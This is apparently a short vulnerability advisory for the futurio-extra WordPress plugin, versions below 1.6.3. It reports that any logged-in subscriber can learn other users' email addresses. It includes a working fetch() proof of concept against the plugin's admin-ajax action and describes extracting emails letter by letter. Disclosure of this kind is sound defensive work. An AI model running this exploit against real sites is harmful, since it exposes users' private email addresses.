The plugin allows any logged in user, such as subscriber, to extract any other user’s email address.
fetch(“http://127.0.0.1:8001/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “dilaz_mb_query_select”, “q”: “@gma”, “query_type”: “user”}), “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); If a given user name appeared in the output list, that means, the user has “@gma” in their e-mail. Then you can extract any user’s e-mail letter-by-letter.
CPE | Name | Operator | Version |
---|---|---|---|
futurio-extra | lt | 1.6.3 |